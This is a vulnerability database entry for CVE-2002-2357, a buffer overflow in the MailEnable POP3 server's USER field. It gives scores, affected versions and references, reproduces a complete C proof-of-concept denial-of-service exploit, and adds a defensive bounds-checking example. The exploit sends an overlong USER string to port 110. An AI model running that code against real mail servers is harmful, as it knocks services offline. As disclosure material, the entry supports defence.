CVE-2002-2357
CVSS 5.0
Published: 2002-12-31 00:00:00
Revised: 2008-09-05 16:33:00
NMCOE    

[Original] MailEnable 1.5 015 through 1.5 018 allows remote attackers to cause a denial of service (crash) via a long USER string, possibly due to a buffer overflow.


[CNNVD] MailEnable Email Server Remote Buffer Overflow Vulnerability (CNNVD-200212-207)

        
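        MailEnable is a web-based mail server program.
        The MailEnable POP3 server does not properly check the data in the user login field. A remote attacker can exploit this vulnerability to carry out a buffer overflow attack, possibly executing arbitrary commands on the system with the privileges of the POP3 process.
        An attacker can connect to a vulnerable MailEnable POP3 service and enter an overly long string at the USER prompt, which triggers the buffer overflow; carefully crafted data may allow arbitrary commands to be executed on the system with the privileges of the POP3 process.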
        

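- CVSS (Base Score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on the confidentiality of the system]
Integrity impact: NONE [no impact on the integrity of the system]
Availability impact: PARTIAL [may cause reduced performance or interrupted access to resources]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: NETWORK [the attacker does not need intranet access or local access]
Authentication: NONE [exploitation requires no authentication]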

- CWE (Weakness Category)

CWE-119 [Improper Restriction of Operations within the Bounds of a Memory Buffer]

- CPE (Affected Platforms and Products)

cpe:/a:mailenable:mailenable:1.5016
cpe:/a:mailenable:mailenable:1.5017
cpe:/a:mailenable:mailenable:1.5018
cpe:/a:mailenable:mailenable:1.5015

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2357
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-2357
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-207
(Official data source) CNNVD

- Other Links and Resources

http://www.securityfocus.com/bid/6197
(PATCH)  BID  6197
http://www.iss.net/security_center/static/10652.php
(UNKNOWN)  XF  mailenable-pop3-server-dos(10652)
http://archives.neohapsis.com/archives/bugtraq/2002-11/0236.html
(UNKNOWN)  BUGTRAQ  20021117 MailEnable POP3 Server remote shutdown !:/ -newest ~ (and previous) bufferoverflow-

- Vulnerability Information

MailEnable Email Server Remote Buffer Overflow Vulnerability
Medium risk  Boundary condition error
2002-12-31 00:00:00 2002-12-31 00:00:00
Remote
        
        

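- Advisories and Patches

        Vendor patch:
        MailEnable
        ----------
        The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version:
        
        http://www.mailenable.com/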

- Vulnerability Information (22023)

MailEnable 1.501x Email Server Buffer Overflow Vulnerability (EDBID:22023)
windows remote
2002-11-18 Verified
0 redsand
N/A
source: http://www.securityfocus.com/bid/6197/info

A buffer overflow vulnerability has been reported for MailEnable's POP3 server. The vulnerability is due to insufficient bounds checking of the USER login field.

An attacker can exploit this vulnerability by connecting to a vulnerable MailEnable server and sending an overly long string as the value for the USER login prompt. This will trigger the buffer overflow condition. 

/*
*
* Written by redsand
* <redsand@redsand.net>
* Vuln. date found: November 18. 2002
* Vulnerable: Windows 9x/NT/XP MailEnable POP Server Version 1.02
*
* Usage: ./mailenable-dos.1.3 <host> [port] [port] is optional. default is in the #define (port 110)
* Need to Enable [offset] in final release.
*
* Proof of Concept code (PoC)
*
*/


#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <strings.h>   /* bzero, bcopy */
#include <unistd.h>    /* close */
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define PORT 110

char string[2010];
char death[2500];
char top[6], end[50];   /* "USER " plus the terminating NUL needs 6 bytes */
char tag[] = "::redsand.net::";

int main(int argc, char *argv[]) {

  int sockfd, port, i;
  char buf[2500];
  struct hostent *ha;
  struct sockaddr_in sa;
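  if (argc < 2) {
    printf("MailEnable POP Server Version 1.02 DoS\n:: redsand <at> redsand.net\r\nUsage: %s <host> <port>\n", argv[0]);
    exit(0);
  }
  /* The optional second argument overrides the default port. */
  if (argv[2]) {
    port = atoi(argv[2]);
  } else {
    port = PORT;
  }
  /* Fill the USER argument with 2009 'A' bytes; string[] is a zero-initialised
     global, so its last byte stays NUL. */
  for (i = 0; i < 2009; i++) {
    string[i] = 'A';
  }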

strcpy(top,"USER ");
strcpy(end,tag);
strcpy(death,top);
strcat(death,string);
strcat(death,end);

  if (!(ha = gethostbyname (argv[1]))) {
    perror ("gethostbyname");
    exit (1);   /* ha is NULL here; continuing would dereference it */
  }

  bzero (&sa, sizeof (sa));
  bcopy (ha->h_addr, (char *) &sa.sin_addr, ha->h_length);
  sa.sin_family = ha->h_addrtype;
  sa.sin_port = htons (port);

  if ((sockfd = socket (ha->h_addrtype, SOCK_STREAM, 0)) < 0) {
    perror ("socket");
    exit (1);
  }
 printf("MailEnable :: redsand <at> redsand.net\r\n+ connecting...\n");
  if (connect (sockfd, (struct sockaddr *) &sa, sizeof(sa)) < 0) {
    perror ("connect");
    exit (1);
  }
  printf("+ connected\n+ sending request to pop3 server\n");
  send(sockfd, death, sizeof(death), 0);
  // read(sockfd, buf, 2050, 0);
    close(sockfd);
  printf("+ finished\n");
  printf("\r\rIf exploit worked, then it should bind port on 3879\n");
}

/* redsand.net */
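
Added example, not part of the original entry or of the PoC author's code: a server-side sketch of the bounds check the advisory describes as missing, which rejects an over-long USER line before anything is copied into a fixed-size buffer. The function name, status codes and the 64-byte mailbox limit are assumptions for illustration; the 255-octet line limit comes from RFC 2449.

```c
/* Added example: bounded parsing of a POP3 USER line (names are hypothetical). */
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define POP3_MAX_LINE 255  /* RFC 2449: max command length, CRLF included */
#define POP3_MAX_USER 64   /* assumed mailbox-name limit for this example */

enum user_rc { USER_OK, USER_NOT_USER, USER_LINE_TOO_LONG,
               USER_NAME_TOO_LONG, USER_MALFORMED };

/* line/len: raw bytes as received (not NUL-terminated).
 * out/outsz: caller buffer that receives the NUL-terminated mailbox name. */
enum user_rc pop3_parse_user(const char *line, size_t len,
                             char *out, size_t outsz)
{
    static const char kw[] = "USER";
    size_t i, n;

    if (outsz == 0) return USER_MALFORMED;
    out[0] = '\0';
    /* Reject oversized input before any copy into a fixed-size buffer. */
    if (len > POP3_MAX_LINE) return USER_LINE_TOO_LONG;
    if (len < 2 || line[len - 2] != '\r' || line[len - 1] != '\n')
        return USER_MALFORMED;
    len -= 2;                                  /* drop CRLF */
    if (len < 5 || line[4] != ' ') return USER_NOT_USER;
    for (i = 0; i < 4; i++)                    /* keyword is case-insensitive */
        if (toupper((unsigned char)line[i]) != kw[i]) return USER_NOT_USER;
    n = len - 5;                               /* argument length */
    if (n == 0) return USER_MALFORMED;
    if (n > POP3_MAX_USER || n >= outsz) return USER_NAME_TOO_LONG;
    for (i = 0; i < n; i++) {                  /* printable ASCII, no spaces */
        unsigned char c = (unsigned char)line[5 + i];
        if (c <= 0x20 || c >= 0x7f) return USER_MALFORMED;
    }
    memcpy(out, line + 5, n);                  /* n < outsz was checked above */
    out[n] = '\0';
    return USER_OK;
}

int main(void)
{
    char name[POP3_MAX_USER + 1], big[2500];   /* constructed oversized input */
    memset(big, 'A', sizeof big);
    memcpy(big, "USER ", 5);
    printf("oversized: %d\n", pop3_parse_user(big, sizeof big, name, sizeof name));
    printf("normal: %d\n", pop3_parse_user("USER alice\r\n", 12, name, sizeof name));
    return 0;
}
```

The receive loop that feeds this function has to enforce the same limit: stop reading and drop the connection once more than POP3_MAX_LINE bytes arrive without a CRLF.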
		

- Vulnerability Information

41362
MailEnable USER String Remote DoS
Remote / Network Access Denial of Service
Loss of Availability Solution Unknown
Exploit Public Uncoordinated Disclosure

- Vulnerability Description

- Timeline

2002-11-17 Unknown
Unknown Unknown

- Solution

Products

Unknown or Incomplete

- Related References

- Vulnerability Author

Unknown or Incomplete
 

 
